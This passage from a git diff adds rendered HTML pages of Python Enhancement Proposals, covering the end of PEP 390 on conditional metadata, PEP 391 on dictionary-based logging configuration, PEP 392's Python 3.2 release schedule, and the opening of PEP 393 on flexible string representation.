When this variable is read, the values are parsed and transformed into a list: +['pywin32', 'bar > 1.0', 'foo'].

+
+
+

Context-dependant sections

+

The metadata section will also be able to use context-dependant sections.

+

A context-dependant section is a section with a condition about the execution +environment. Here’s some examples:

+
[metadata]
+name = Distribute
+version = 0.6.4
+
+[metadata:sys_platform == 'win32']
+requires = pywin32, bar > 1.0
+obsoletes = pywin31
+
+[metadata:os_machine == 'i386']
+requires = foo
+
+[metadata:python_version == '2.4' or python_version == '2.5']
+requires = bar
+
+[metadata:'linux' in sys_platform]
+requires = baz
+
+
+

Every [metadata:condition] section will be used only if the condition +is met when the file is read. The background motivation for these +context-dependant sections is to be able to define requirements that varies +depending on the platform the distribution might be installed on. +(see PEP 314).

+

The micro-language behind this is the simplest possible: it compares only +strings, with the == and in operators (and their opposites), and +with the ability to combine expressions. It makes it also easy to understand +to non-pythoneers.

+

The pseudo-grammar is

+
EXPR [in|==|!=|not in] EXPR [or|and] ...
+
+
+

where EXPR belongs to any of those:

+
    +
  • python_version = ‘%s.%s’ % (sys.version_info[0], sys.version_info[1])
  • +
  • os_name = os.name
  • +
  • sys_platform = sys.platform
  • +
  • platform_version = platform.version()
  • +
  • platform_machine = platform.machine()
  • +
  • a free string, like 2.4, or win32
  • +
+

Notice that in is restricted to strings, meaning that it is not possible +to use other sequences like tuples or lists on the right side.

+

Distutils will provide a function that is able to generate the metadata +of a distribution, given a setup.cfg file, for the execution environment:

+
>>> from distutils.util import local_metadata
+>>> local_metadata('setup.cfg')
+<DistributionMetadata instance>
+
+
+

This means that a vanilla Python will be able to read the metadata of a +package without running any third party code.

+

Notice that this feature is not restricted to the metadata namespace. +Consequently, any other section can be extended with such context-dependant +sections.

+
+
+

Impact on PKG-INFO generation and PEP 314

+

When PKG-INFO is generated by Distutils, every field that relies on a +condition will have that condition written at the end of the line, after a +; separator:

+
Metadata-Version: 1.2
+Name: distribute
+Version: 0.6.4
+...
+Requires: pywin32, bar > 1.0; sys_platform == 'win32'
+Requires: foo; os_machine == 'i386'
+Requires: bar; python_version == '2.4' or python_version == '2.5'
+Requires: baz; 'linux' in sys_platform
+Obsoletes = pywin31; sys_platform == 'win32'
+...
+Classifier: Development Status :: 5 - Production/Stable
+Classifier: Intended Audience :: Developers
+Classifier: License :: OSI Approved :: Python Software Foundation License
+
+
+

Notice that this file can be opened with the DistributionMetadata class. +This class will be able to use the micro-language using the execution +environment.

+

Let’s run in on a Python 2.5 i386 Linux:

+
>>> from distutils.dist import DistributionMetadata
+>>> metadata = DistributionMetadata('PKG_INFO')
+>>> metadata.get_requires()
+['foo', 'bar', 'baz']
+
+
+

The execution environment can be overridden in case we want to get the metadata +for another environment:

+
>>> env = {'python_version': '2.4',
+...        'os_name': 'nt',
+...        'sys_platform': 'win32',
+...        'platform_version': 'MVCC++ 6.0'
+...        'platform_machine': 'i386'}
+...
+>>> metadata = DistributionMetadata('PKG_INFO', environment=env)
+>>> metadata.get_requires()
+['bar > 1.0', 'foo', 'bar']
+
+
+

PEP 314 is changed accordingly, meaning that each field will be able to +have that extra condition marker.

+
+
+

Compatibility

+

This change is based on a new metadata 1.2 format meaning that +Distutils will be able to distinguish old PKG-INFO files from new ones.

+

The setup.cfg file change will stay ConfigParser-compatible and +will not break existing setup.cfg files.

+
+
+

Limitations

+

We are not providing < and > operators at this time, and +python_version is a regular string. This implies using or operators +when a section needs to be restricted to a couple of Python versions. +Although, if PEP 386 is accepted, python_version could be changed +internally into something comparable with strings, and +< and > operators introduced.

+

Last, if a distribution is unable to set all metadata fields in setup.cfg, +that’s fine, the fields will be set to UNKNOWN when local_metadata is +called. Getting UNKNOWN values will mean that it might be necessary to +run the setup.py command line interface to get the whole set of metadata.

+
+
+

Acknowledgments

+

The Distutils-SIG.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0390.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0391/index.html b/pep-0391/index.html new file mode 100644 index 00000000000..8db9e172425 --- /dev/null +++ b/pep-0391/index.html @@ -0,0 +1,758 @@ + + + + + + + + PEP 391 – Dictionary-Based Configuration For Logging | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 391 – Dictionary-Based Configuration For Logging

+
+
Author:
+
Vinay Sajip <vinay_sajip at red-dove.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
15-Oct-2009
+
Python-Version:
+
2.7, 3.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes a new way of configuring logging using a dictionary +to hold configuration information.

+
+
+

Rationale

+

The present means for configuring Python’s logging package is either +by using the logging API to configure logging programmatically, or +else by means of ConfigParser-based configuration files.

+

Programmatic configuration, while offering maximal control, fixes the +configuration in Python code. This does not facilitate changing it +easily at runtime, and, as a result, the ability to flexibly turn the +verbosity of logging up and down for different parts of a using +application is lost. This limits the usability of logging as an aid +to diagnosing problems - and sometimes, logging is the only diagnostic +aid available in production environments.

+

The ConfigParser-based configuration system is usable, but does not +allow its users to configure all aspects of the logging package. For +example, Filters cannot be configured using this system. Furthermore, +the ConfigParser format appears to engender dislike (sometimes strong +dislike) in some quarters. Though it was chosen because it was the +only configuration format supported in the Python standard at that +time, many people regard it (or perhaps just the particular schema +chosen for logging’s configuration) as ‘crufty’ or ‘ugly’, in some +cases apparently on purely aesthetic grounds.

+

Recent versions of Python include JSON support in the standard +library, and this is also usable as a configuration format. In other +environments, such as Google App Engine, YAML is used to configure +applications, and usually the configuration of logging would be +considered an integral part of the application configuration. +Although the standard library does not contain YAML support at +present, support for both JSON and YAML can be provided in a common +way because both of these serialization formats allow deserialization +to Python dictionaries.

+

By providing a way to configure logging by passing the configuration +in a dictionary, logging will be easier to configure not only for +users of JSON and/or YAML, but also for users of custom configuration +methods, by providing a common format in which to describe the desired +configuration.

+

Another drawback of the current ConfigParser-based configuration +system is that it does not support incremental configuration: a new +configuration completely replaces the existing configuration. +Although full flexibility for incremental configuration is difficult +to provide in a multi-threaded environment, the new configuration +mechanism will allow the provision of limited support for incremental +configuration.

+
+
+

Specification

+

The specification consists of two parts: the API and the format of the +dictionary used to convey configuration information (i.e. the schema +to which it must conform).

+
+

Naming

+

Historically, the logging package has not been PEP 8 conformant. +At some future time, this will be corrected by changing method and +function names in the package in order to conform with PEP 8. +However, in the interests of uniformity, the proposed additions to the +API use a naming scheme which is consistent with the present scheme +used by logging.

+
+
+

API

+

The logging.config module will have the following addition:

+
    +
  • A function, called dictConfig(), which takes a single argument +- the dictionary holding the configuration. Exceptions will be +raised if there are errors while processing the dictionary.
  • +
+

It will be possible to customize this API - see the section on API +Customization. Incremental configuration is covered in its own +section.

+
+
+

Dictionary Schema - Overview

+

Before describing the schema in detail, it is worth saying a few words +about object connections, support for user-defined objects and access +to external and internal objects.

+
+

Object connections

+

The schema is intended to describe a set of logging objects - loggers, +handlers, formatters, filters - which are connected to each other in +an object graph. Thus, the schema needs to represent connections +between the objects. For example, say that, once configured, a +particular logger has attached to it a particular handler. For the +purposes of this discussion, we can say that the logger represents the +source, and the handler the destination, of a connection between the +two. Of course in the configured objects this is represented by the +logger holding a reference to the handler. In the configuration dict, +this is done by giving each destination object an id which identifies +it unambiguously, and then using the id in the source object’s +configuration to indicate that a connection exists between the source +and the destination object with that id.

+

So, for example, consider the following YAML snippet:

+
formatters:
+  brief:
+    # configuration for formatter with id 'brief' goes here
+  precise:
+    # configuration for formatter with id 'precise' goes here
+handlers:
+  h1: #This is an id
+   # configuration of handler with id 'h1' goes here
+   formatter: brief
+  h2: #This is another id
+   # configuration of handler with id 'h2' goes here
+   formatter: precise
+loggers:
+  foo.bar.baz:
+    # other configuration for logger 'foo.bar.baz'
+    handlers: [h1, h2]
+
+
+

(Note: YAML will be used in this document as it is a little more +readable than the equivalent Python source form for the dictionary.)

+

The ids for loggers are the logger names which would be used +programmatically to obtain a reference to those loggers, e.g. +foo.bar.baz. The ids for Formatters and Filters can be any string +value (such as brief, precise above) and they are transient, +in that they are only meaningful for processing the configuration +dictionary and used to determine connections between objects, and are +not persisted anywhere when the configuration call is complete.

+

Handler ids are treated specially, see the section on +Handler Ids, below.

+

The above snippet indicates that logger named foo.bar.baz should +have two handlers attached to it, which are described by the handler +ids h1 and h2. The formatter for h1 is that described by id +brief, and the formatter for h2 is that described by id +precise.

+
+
+

User-defined objects

+

The schema should support user-defined objects for handlers, filters +and formatters. (Loggers do not need to have different types for +different instances, so there is no support - in the configuration - +for user-defined logger classes.)

+

Objects to be configured will typically be described by dictionaries +which detail their configuration. In some places, the logging system +will be able to infer from the context how an object is to be +instantiated, but when a user-defined object is to be instantiated, +the system will not know how to do this. In order to provide complete +flexibility for user-defined object instantiation, the user will need +to provide a ‘factory’ - a callable which is called with a +configuration dictionary and which returns the instantiated object. +This will be signalled by an absolute import path to the factory being +made available under the special key '()'. Here’s a concrete +example:

+
formatters:
+  brief:
+    format: '%(message)s'
+  default:
+    format: '%(asctime)s %(levelname)-8s %(name)-15s %(message)s'
+    datefmt: '%Y-%m-%d %H:%M:%S'
+  custom:
+      (): my.package.customFormatterFactory
+      bar: baz
+      spam: 99.9
+      answer: 42
+
+
+

The above YAML snippet defines three formatters. The first, with id +brief, is a standard logging.Formatter instance with the +specified format string. The second, with id default, has a +longer format and also defines the time format explicitly, and will +result in a logging.Formatter initialized with those two format +strings. Shown in Python source form, the brief and default +formatters have configuration sub-dictionaries:

+
{
+  'format' : '%(message)s'
+}
+
+
+

and:

+
{
+  'format' : '%(asctime)s %(levelname)-8s %(name)-15s %(message)s',
+  'datefmt' : '%Y-%m-%d %H:%M:%S'
+}
+
+
+

respectively, and as these dictionaries do not contain the special key +'()', the instantiation is inferred from the context: as a result, +standard logging.Formatter instances are created. The +configuration sub-dictionary for the third formatter, with id +custom, is:

+
{
+  '()' : 'my.package.customFormatterFactory',
+  'bar' : 'baz',
+  'spam' : 99.9,
+  'answer' : 42
+}
+
+
+

and this contains the special key '()', which means that +user-defined instantiation is wanted. In this case, the specified +factory callable will be used. If it is an actual callable it will be +used directly - otherwise, if you specify a string (as in the example) +the actual callable will be located using normal import mechanisms. +The callable will be called with the remaining items in the +configuration sub-dictionary as keyword arguments. In the above +example, the formatter with id custom will be assumed to be +returned by the call:

+
my.package.customFormatterFactory(bar='baz', spam=99.9, answer=42)
+
+
+

The key '()' has been used as the special key because it is not a +valid keyword parameter name, and so will not clash with the names of +the keyword arguments used in the call. The '()' also serves as a +mnemonic that the corresponding value is a callable.

+
+
+

Access to external objects

+

There are times where a configuration will need to refer to objects +external to the configuration, for example sys.stderr. If the +configuration dict is constructed using Python code then this is +straightforward, but a problem arises when the configuration is +provided via a text file (e.g. JSON, YAML). In a text file, there is +no standard way to distinguish sys.stderr from the literal string +'sys.stderr'. To facilitate this distinction, the configuration +system will look for certain special prefixes in string values and +treat them specially. For example, if the literal string +'ext://sys.stderr' is provided as a value in the configuration, +then the ext:// will be stripped off and the remainder of the +value processed using normal import mechanisms.

+

The handling of such prefixes will be done in a way analogous to +protocol handling: there will be a generic mechanism to look for +prefixes which match the regular expression +^(?P<prefix>[a-z]+)://(?P<suffix>.*)$ whereby, if the prefix +is recognised, the suffix is processed in a prefix-dependent +manner and the result of the processing replaces the string value. If +the prefix is not recognised, then the string value will be left +as-is.

+

The implementation will provide for a set of standard prefixes such as +ext:// but it will be possible to disable the mechanism completely +or provide additional or different prefixes for special handling.

+
+
+

Access to internal objects

+

As well as external objects, there is sometimes also a need to refer +to objects in the configuration. This will be done implicitly by the +configuration system for things that it knows about. For example, the +string value 'DEBUG' for a level in a logger or handler will +automatically be converted to the value logging.DEBUG, and the +handlers, filters and formatter entries will take an +object id and resolve to the appropriate destination object.

+

However, a more generic mechanism needs to be provided for the case +of user-defined objects which are not known to logging. For example, +take the instance of logging.handlers.MemoryHandler, which takes +a target which is another handler to delegate to. Since the system +already knows about this class, then in the configuration, the given +target just needs to be the object id of the relevant target +handler, and the system will resolve to the handler from the id. If, +however, a user defines a my.package.MyHandler which has a +alternate handler, the configuration system would not know that +the alternate referred to a handler. To cater for this, a +generic resolution system will be provided which allows the user to +specify:

+
handlers:
+  file:
+    # configuration of file handler goes here
+
+  custom:
+    (): my.package.MyHandler
+    alternate: cfg://handlers.file
+
+
+

The literal string 'cfg://handlers.file' will be resolved in an +analogous way to the strings with the ext:// prefix, but looking +in the configuration itself rather than the import namespace. The +mechanism will allow access by dot or by index, in a similar way to +that provided by str.format. Thus, given the following snippet:

+
handlers:
+  email:
+    class: logging.handlers.SMTPHandler
+    mailhost: localhost
+    fromaddr: my_app@domain.tld
+    toaddrs:
+      - support_team@domain.tld
+      - dev_team@domain.tld
+    subject: Houston, we have a problem.
+
+
+

in the configuration, the string 'cfg://handlers' would resolve to +the dict with key handlers, the string 'cfg://handlers.email +would resolve to the dict with key email in the handlers dict, +and so on. The string 'cfg://handlers.email.toaddrs[1] would +resolve to 'dev_team.domain.tld' and the string +'cfg://handlers.email.toaddrs[0]' would resolve to the value +'support_team@domain.tld'. The subject value could be accessed +using either 'cfg://handlers.email.subject' or, equivalently, +'cfg://handlers.email[subject]'. The latter form only needs to be +used if the key contains spaces or non-alphanumeric characters. If an +index value consists only of decimal digits, access will be attempted +using the corresponding integer value, falling back to the string +value if needed.

+

Given a string cfg://handlers.myhandler.mykey.123, this will +resolve to config_dict['handlers']['myhandler']['mykey']['123']. +If the string is specified as cfg://handlers.myhandler.mykey[123], +the system will attempt to retrieve the value from +config_dict['handlers']['myhandler']['mykey'][123], and fall back +to config_dict['handlers']['myhandler']['mykey']['123'] if that +fails.

+
+
+

Handler Ids

+

Some specific logging configurations require the use of handler levels +to achieve the desired effect. However, unlike loggers which can +always be identified by their names, handlers have no persistent +handles whereby levels can be changed via an incremental configuration +call.

+

Therefore, this PEP proposes to add an optional name property to +handlers. If used, this will add an entry in a dictionary which maps +the name to the handler. (The entry will be removed when the handler +is closed.) When an incremental configuration call is made, handlers +will be looked up in this dictionary to set the handler level +according to the value in the configuration. See the section on +incremental configuration for more details.

+

In theory, such a “persistent name” facility could also be provided +for Filters and Formatters. However, there is not a strong case to be +made for being able to configure these incrementally. On the basis +that practicality beats purity, only Handlers will be given this new +name property. The id of a handler in the configuration will +become its name.

+

The handler name lookup dictionary is for configuration use only and +will not become part of the public API for the package.

+
+
+
+

Dictionary Schema - Detail

+

The dictionary passed to dictConfig() must contain the following +keys:

+
    +
  • version - to be set to an integer value representing the schema +version. The only valid value at present is 1, but having this key +allows the schema to evolve while still preserving backwards +compatibility.
  • +
+

All other keys are optional, but if present they will be interpreted +as described below. In all cases below where a ‘configuring dict’ is +mentioned, it will be checked for the special '()' key to see if a +custom instantiation is required. If so, the mechanism described +above is used to instantiate; otherwise, the context is used to +determine how to instantiate.

+
    +
  • formatters - the corresponding value will be a dict in which each +key is a formatter id and each value is a dict describing how to +configure the corresponding Formatter instance.

    The configuring dict is searched for keys format and datefmt +(with defaults of None) and these are used to construct a +logging.Formatter instance.

    +
  • +
  • filters - the corresponding value will be a dict in which each key +is a filter id and each value is a dict describing how to configure +the corresponding Filter instance.

    The configuring dict is searched for key name (defaulting to the +empty string) and this is used to construct a logging.Filter +instance.

    +
  • +
  • handlers - the corresponding value will be a dict in which each +key is a handler id and each value is a dict describing how to +configure the corresponding Handler instance.

    The configuring dict is searched for the following keys:

    +
      +
    • class (mandatory). This is the fully qualified name of the +handler class.
    • +
    • level (optional). The level of the handler.
    • +
    • formatter (optional). The id of the formatter for this +handler.
    • +
    • filters (optional). A list of ids of the filters for this +handler.
    • +
    +

    All other keys are passed through as keyword arguments to the +handler’s constructor. For example, given the snippet:

    +
    handlers:
    +  console:
    +    class : logging.StreamHandler
    +    formatter: brief
    +    level   : INFO
    +    filters: [allow_foo]
    +    stream  : ext://sys.stdout
    +  file:
    +    class : logging.handlers.RotatingFileHandler
    +    formatter: precise
    +    filename: logconfig.log
    +    maxBytes: 1024
    +    backupCount: 3
    +
    +
    +

    the handler with id console is instantiated as a +logging.StreamHandler, using sys.stdout as the underlying +stream. The handler with id file is instantiated as a +logging.handlers.RotatingFileHandler with the keyword arguments +filename='logconfig.log', maxBytes=1024, backupCount=3.

    +
  • +
  • loggers - the corresponding value will be a dict in which each key +is a logger name and each value is a dict describing how to +configure the corresponding Logger instance.

    The configuring dict is searched for the following keys:

    +
      +
    • level (optional). The level of the logger.
    • +
    • propagate (optional). The propagation setting of the logger.
    • +
    • filters (optional). A list of ids of the filters for this +logger.
    • +
    • handlers (optional). A list of ids of the handlers for this +logger.
    • +
    +

    The specified loggers will be configured according to the level, +propagation, filters and handlers specified.

    +
  • +
  • root - this will be the configuration for the root logger. +Processing of the configuration will be as for any logger, except +that the propagate setting will not be applicable.
  • +
  • incremental - whether the configuration is to be interpreted as +incremental to the existing configuration. This value defaults to +False, which means that the specified configuration replaces the +existing configuration with the same semantics as used by the +existing fileConfig() API.

    If the specified value is True, the configuration is processed +as described in the section on Incremental Configuration, below.

    +
  • +
  • disable_existing_loggers - whether any existing loggers are to be +disabled. This setting mirrors the parameter of the same name in +fileConfig(). If absent, this parameter defaults to True. +This value is ignored if incremental is True.
  • +
+
+
+

A Working Example

+

The following is an actual working configuration in YAML format +(except that the email addresses are bogus):

+
formatters:
+  brief:
+    format: '%(levelname)-8s: %(name)-15s: %(message)s'
+  precise:
+    format: '%(asctime)s %(name)-15s %(levelname)-8s %(message)s'
+filters:
+  allow_foo:
+    name: foo
+handlers:
+  console:
+    class : logging.StreamHandler
+    formatter: brief
+    level   : INFO
+    stream  : ext://sys.stdout
+    filters: [allow_foo]
+  file:
+    class : logging.handlers.RotatingFileHandler
+    formatter: precise
+    filename: logconfig.log
+    maxBytes: 1024
+    backupCount: 3
+  debugfile:
+    class : logging.FileHandler
+    formatter: precise
+    filename: logconfig-detail.log
+    mode: a
+  email:
+    class: logging.handlers.SMTPHandler
+    mailhost: localhost
+    fromaddr: my_app@domain.tld
+    toaddrs:
+      - support_team@domain.tld
+      - dev_team@domain.tld
+    subject: Houston, we have a problem.
+loggers:
+  foo:
+    level : ERROR
+    handlers: [debugfile]
+  spam:
+    level : CRITICAL
+    handlers: [debugfile]
+    propagate: no
+  bar.baz:
+    level: WARNING
+root:
+  level     : DEBUG
+  handlers  : [console, file]
+
+
+
+
+
+

Incremental Configuration

+

It is difficult to provide complete flexibility for incremental +configuration. For example, because objects such as filters +and formatters are anonymous, once a configuration is set up, it is +not possible to refer to such anonymous objects when augmenting a +configuration.

+

Furthermore, there is not a compelling case for arbitrarily altering +the object graph of loggers, handlers, filters, formatters at +run-time, once a configuration is set up; the verbosity of loggers and +handlers can be controlled just by setting levels (and, in the case of +loggers, propagation flags). Changing the object graph arbitrarily in +a safe way is problematic in a multi-threaded environment; while not +impossible, the benefits are not worth the complexity it adds to the +implementation.

+

Thus, when the incremental key of a configuration dict is present +and is True, the system will ignore any formatters and +filters entries completely, and process only the level +settings in the handlers entries, and the level and +propagate settings in the loggers and root entries.

+

It’s certainly possible to provide incremental configuration by other +means, for example making dictConfig() take an incremental +keyword argument which defaults to False. The reason for +suggesting that a value in the configuration dict be used is that it +allows for configurations to be sent over the wire as pickled dicts +to a socket listener. Thus, the logging verbosity of a long-running +application can be altered over time with no need to stop and +restart the application.

+

Note: Feedback on incremental configuration needs based on your +practical experience will be particularly welcome.

+
+
+

API Customization

+

The bare-bones dictConfig() API will not be sufficient for all +use cases. Provision for customization of the API will be made by +providing the following:

+
    +
  • A class, called DictConfigurator, whose constructor is passed +the dictionary used for configuration, and which has a +configure() method.
  • +
  • A callable, called dictConfigClass, which will (by default) be +set to DictConfigurator. This is provided so that if desired, +DictConfigurator can be replaced with a suitable user-defined +implementation.
  • +
+

The dictConfig() function will call dictConfigClass passing +the specified dictionary, and then call the configure() method on +the returned object to actually put the configuration into effect:

+
def dictConfig(config):
+    dictConfigClass(config).configure()
+
+
+

This should cater to all customization needs. For example, a subclass +of DictConfigurator could call DictConfigurator.__init__() in +its own __init__(), then set up custom prefixes which would be +usable in the subsequent configure() call. The dictConfigClass +would be bound to the subclass, and then dictConfig() could be +called exactly as in the default, uncustomized state.

+
+
+

Change to Socket Listener Implementation

+

The existing socket listener implementation will be modified as +follows: when a configuration message is received, an attempt will be +made to deserialize to a dictionary using the json module. If this +step fails, the message will be assumed to be in the fileConfig format +and processed as before. If deserialization is successful, then +dictConfig() will be called to process the resulting dictionary.

+
+
+

Configuration Errors

+

If an error is encountered during configuration, the system will raise +a ValueError, TypeError, AttributeError or ImportError +with a suitably descriptive message. The following is a (possibly +incomplete) list of conditions which will raise an error:

+
    +
  • A level which is not a string or which is a string not +corresponding to an actual logging level
  • +
  • A propagate value which is not a boolean
  • +
  • An id which does not have a corresponding destination
  • +
  • A non-existent handler id found during an incremental call
  • +
  • An invalid logger name
  • +
  • Inability to resolve to an internal or external object
  • +
+
+
+

Discussion in the community

+

The PEP has been announced on python-dev and python-list. While there +hasn’t been a huge amount of discussion, this is perhaps to be +expected for a niche topic.

+

Discussion threads on python-dev:

+

https://mail.python.org/pipermail/python-dev/2009-October/092695.html +https://mail.python.org/pipermail/python-dev/2009-October/092782.html +https://mail.python.org/pipermail/python-dev/2009-October/093062.html

+

And on python-list:

+

https://mail.python.org/pipermail/python-list/2009-October/1223658.html +https://mail.python.org/pipermail/python-list/2009-October/1224228.html

+

There have been some comments in favour of the proposal, no +objections to the proposal as a whole, and some questions and +objections about specific details. These are believed by the author +to have been addressed by making changes to the PEP.

+
+
+

Reference implementation

+

A reference implementation of the changes is available as a module +dictconfig.py with accompanying unit tests in test_dictconfig.py, at:

+

http://bitbucket.org/vinay.sajip/dictconfig

+

This incorporates all features other than the socket listener change.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0391.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0392/index.html b/pep-0392/index.html new file mode 100644 index 00000000000..a5c4bdb9718 --- /dev/null +++ b/pep-0392/index.html @@ -0,0 +1,254 @@ + + + + + + + + PEP 392 – Python 3.2 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 392 – Python 3.2 Release Schedule

+
+
Author:
+
Georg Brandl <georg at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
30-Dec-2009
+
Python-Version:
+
3.2
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for the +Python 3.2 series. The schedule primarily concerns itself with PEP-sized +items.

+
+
+

Release Manager and Crew

+
    +
  • 3.2 Release Manager: Georg Brandl
  • +
  • Windows installers: Martin v. Loewis
  • +
  • Mac installers: Ronald Oussoren
  • +
  • Documentation: Georg Brandl
  • +
+
+
+

3.2 Lifespan

+

3.2 will receive bugfix updates approximately every 4-6 months for +approximately 18 months. After the release of 3.3.0 final (see PEP +398), a final 3.2 bugfix update will be released. After that, +security updates (source only) will be released until 5 years after +the release of 3.2 final, which was planned for February 2016.

+

As of 2016-02-20, Python 3.2.x reached end-of-life status. The final +source release was 3.2.6 in October 2014.

+
+
+

Release Schedule

+
+

3.2 schedule

+
    +
  • 3.2 alpha 1: August 1, 2010
  • +
  • 3.2 alpha 2: September 6, 2010
  • +
  • 3.2 alpha 3: October 12, 2010
  • +
  • 3.2 alpha 4: November 16, 2010
  • +
  • 3.2 beta 1: December 6, 2010
  • +
+

(No new features beyond this point.)

+
    +
  • 3.2 beta 2: December 20, 2010
  • +
  • 3.2 candidate 1: January 16, 2011
  • +
  • 3.2 candidate 2: January 31, 2011
  • +
  • 3.2 candidate 3: February 14, 2011
  • +
  • 3.2 final: February 20, 2011
  • +
+
+
+

3.2.1 schedule

+
    +
  • 3.2.1 beta 1: May 8, 2011
  • +
  • 3.2.1 candidate 1: May 17, 2011
  • +
  • 3.2.1 candidate 2: July 3, 2011
  • +
  • 3.2.1 final: July 11, 2011
  • +
+
+
+

3.2.2 schedule

+
    +
  • 3.2.2 candidate 1: August 14, 2011
  • +
  • 3.2.2 final: September 4, 2011
  • +
+
+
+

3.2.3 schedule

+
    +
  • 3.2.3 candidate 1: February 25, 2012
  • +
  • 3.2.3 candidate 2: March 18, 2012
  • +
  • 3.2.3 final: April 11, 2012
  • +
+
+
+

3.2.4 schedule

+
    +
  • 3.2.4 candidate 1: March 23, 2013
  • +
  • 3.2.4 final: April 6, 2013
  • +
+
+
+

3.2.5 schedule (regression fix release)

+
    +
  • 3.2.5 final: May 13, 2013
  • +
+

– Only security releases after 3.2.5 –

+
+
+

3.2.6 schedule

+
    +
  • 3.2.6 candidate 1 (source-only release): October 4, 2014
  • +
  • 3.2.6 final (source-only release): October 11, 2014
  • +
+
+
+
+

Features for 3.2

+

Note that PEP 3003 is in effect: no changes to language +syntax and no additions to the builtins may be made.

+

No large-scale changes have been recorded yet.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0392.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0393/index.html b/pep-0393/index.html new file mode 100644 index 00000000000..2d5ca7f10d7 --- /dev/null +++ b/pep-0393/index.html @@ -0,0 +1,663 @@ + + + + + + + + PEP 393 – Flexible String Representation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 393 – Flexible String Representation

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
24-Jan-2010
+
Python-Version:
+
3.3
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

The Unicode string type is changed to support multiple internal +representations, depending on the character with the largest Unicode +ordinal (1, 2, or 4 bytes). This will allow a space-efficient +representation in common cases, but give access to full UCS-4 on all +systems. For compatibility with existing APIs, several representations +may exist in parallel; over time, this compatibility should be phased +out. The distinction between narrow and wide Unicode builds is +dropped. An implementation of this PEP is available at [1].

+
+
+

Rationale

+

There are two classes of complaints about the current implementation +of the unicode type: on systems only supporting UTF-16, users complain +that non-BMP characters are not properly supported. On systems using +UCS-4 internally (and also sometimes on systems using UCS-2), there is +a complaint that Unicode strings take up too much memory - especially +compared to Python 2.x, where the same code would often use ASCII +strings (i.e. ASCII-encoded byte strings). With the proposed approach, +ASCII-only Unicode strings will again use only one byte per character; +while still allowing efficient indexing of strings containing non-BMP +characters (as strings containing them will use 4 bytes per +character).

+

One problem with the approach is support for existing applications +(e.g. extension modules). For compatibility, redundant representations +may be computed. Applications are encouraged to phase out reliance on +a specific internal representation if possible. As interaction with +other libraries will often require some sort of internal +representation, the specification chooses UTF-8 as the recommended way +of exposing strings to C code.

+

For many strings (e.g. ASCII), multiple representations may actually +share memory (e.g. the shortest form may be shared with the UTF-8 form +if all characters are ASCII). With such sharing, the overhead of +compatibility representations is reduced. If representations do share +data, it is also possible to omit structure fields, reducing the base +size of string objects.

+
+
+

Specification

+

Unicode structures are now defined as a hierarchy of structures, +namely:

+
typedef struct {
+  PyObject_HEAD
+  Py_ssize_t length;
+  Py_hash_t hash;
+  struct {
+      unsigned int interned:2;
+      unsigned int kind:2;
+      unsigned int compact:1;
+      unsigned int ascii:1;
+      unsigned int ready:1;
+  } state;
+  wchar_t *wstr;
+} PyASCIIObject;
+
+typedef struct {
+  PyASCIIObject _base;
+  Py_ssize_t utf8_length;
+  char *utf8;
+  Py_ssize_t wstr_length;
+} PyCompactUnicodeObject;
+
+typedef struct {
+  PyCompactUnicodeObject _base;
+  union {
+      void *any;
+      Py_UCS1 *latin1;
+      Py_UCS2 *ucs2;
+      Py_UCS4 *ucs4;
+  } data;
+} PyUnicodeObject;
+
+
+

Objects for which both size and maximum character are known at +creation time are called “compact” unicode objects; character data +immediately follow the base structure. If the maximum character is +less than 128, they use the PyASCIIObject structure, and the UTF-8 +data, the UTF-8 length and the wstr length are the same as the length +of the ASCII data. For non-ASCII strings, the PyCompactObject +structure is used. Resizing compact objects is not supported.

+

Objects for which the maximum character is not given at creation time +are called “legacy” objects, created through +PyUnicode_FromStringAndSize(NULL, length). They use the +PyUnicodeObject structure. Initially, their data is only in the wstr +pointer; when PyUnicode_READY is called, the data pointer (union) is +allocated. Resizing is possible as long PyUnicode_READY has not been +called.

+

The fields have the following interpretations:

+
    +
  • length: number of code points in the string (result of sq_length)
  • +
  • interned: interned-state (SSTATE_*) as in 3.2
  • +
  • kind: form of string
      +
    • 00 => str is not initialized (data are in wstr)
    • +
    • 01 => 1 byte (Latin-1)
    • +
    • 10 => 2 byte (UCS-2)
    • +
    • 11 => 4 byte (UCS-4);
    • +
    +
  • +
  • compact: the object uses one of the compact representations +(implies ready)
  • +
  • ascii: the object uses the PyASCIIObject representation +(implies compact and ready)
  • +
  • ready: the canonical representation is ready to be accessed through +PyUnicode_DATA and PyUnicode_GET_LENGTH. This is set either if the +object is compact, or the data pointer and length have been +initialized.
  • +
  • wstr_length, wstr: representation in platform’s wchar_t +(null-terminated). If wchar_t is 16-bit, this form may use surrogate +pairs (in which cast wstr_length differs form length). +wstr_length differs from length only if there are surrogate pairs +in the representation.
  • +
  • utf8_length, utf8: UTF-8 representation (null-terminated).
  • +
  • data: shortest-form representation of the unicode string. +The string is null-terminated (in its respective representation).
